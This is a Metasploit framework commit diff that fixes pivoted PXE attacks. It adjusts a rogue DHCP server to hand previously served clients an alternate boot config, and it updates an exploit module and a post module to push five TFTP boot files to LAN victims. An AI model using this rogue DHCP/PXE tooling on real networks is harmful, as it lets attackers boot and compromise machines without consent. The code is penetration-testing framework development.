Fixes #5312 for pivoted PXE attacks.

git-svn-id: file:///home/svn/framework3/trunk@13634 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Matt Weeks 2011-08-25 02:07:35 +00:00
parent 53e43fa847
commit 06c3dabe31
5 changed files with 13 additions and 9 deletions

Binary file not shown.

View File

@ -222,6 +222,9 @@ int DHCPserv::run(){
string pxeConfigFile("update2"); string pxeConfigFile("update2");
stringOptionCheck(&pxeConfigFile, "PXECONF"); stringOptionCheck(&pxeConfigFile, "PXECONF");
string pxeAltConfigFile("update0");
stringOptionCheck(&pxeAltConfigFile, "PXEALTCONF");
string pxePathPrefix(""); string pxePathPrefix("");
//get DHCP parameters //get DHCP parameters
unsigned int leaseTime = 600; unsigned int leaseTime = 600;
@ -336,10 +339,6 @@ int DHCPserv::run(){
if (messageType == DHCPDiscover){ //DHCP Discover - send DHCP Offer if (messageType == DHCPDiscover){ //DHCP Discover - send DHCP Offer
pkt << DHCPOffer; pkt << DHCPOffer;
// check if already served based on hw addr (MAC address)
if (serveOnce == true && served.count(clienthwaddr) > 0)
continue; //Already served; allowing normal boot
}else if (messageType == DHCPRequest){ //DHCP Request - send DHCP ACK }else if (messageType == DHCPRequest){ //DHCP Request - send DHCP ACK
pkt << DHCPAck; pkt << DHCPAck;
@ -360,7 +359,12 @@ int DHCPserv::run(){
pkt << dhcpoption(OpDns, iton(dnsServer)); pkt << dhcpoption(OpDns, iton(dnsServer));
string pxemagic(PXEMagic,4); string pxemagic(PXEMagic,4);
pkt << dhcpoption(OpPXEMagic, pxemagic); pkt << dhcpoption(OpPXEMagic, pxemagic);
pkt << dhcpoption(OpPXEConfigFile, pxeConfigFile);
// check if already served based on hw addr (MAC address)
if (serveOnce == true && served.count(clienthwaddr) > 0)
pkt << dhcpoption(OpPXEConfigFile, pxeAltConfigFile); //Already served; allowing normal boot
else
pkt << dhcpoption(OpPXEConfigFile, pxeConfigFile);
pkt << dhcpoption(OpPXEPathPrefix, pxePathPrefix); pkt << dhcpoption(OpPXEPathPrefix, pxePathPrefix);
pkt << dhcpoption(OpPXERebootTime, iton(pxeRebootTime)); pkt << dhcpoption(OpPXERebootTime, iton(pxeRebootTime));
if ( hostname.length() > 0 ){ if ( hostname.length() > 0 ){

View File

@ -93,8 +93,8 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Loading DHCP options...") print_status("Loading DHCP options...")
client.lanattacks.load_dhcp_options(datastore) client.lanattacks.load_dhcp_options(datastore)
1.upto(4) do |i| 0.upto(4) do |i|
print_status("Loading file #{i} of 4") print_status("Loading file #{i+1} of 5")
if i < 4 if i < 4
contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}")) contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
else else

View File

@ -71,8 +71,8 @@ class Metasploit3 < Msf::Post
print_status("Loading DHCP options...") print_status("Loading DHCP options...")
client.lanattacks.load_dhcp_options(datastore) client.lanattacks.load_dhcp_options(datastore)
1.upto(4) do |i| 0.upto(4) do |i|
print_status("Loading file #{i} of 4") print_status("Loading file #{i+1} of 5")
contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}")) contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
client.lanattacks.add_tftp_file("update#{i}",contents) client.lanattacks.add_tftp_file("update#{i}",contents)
end end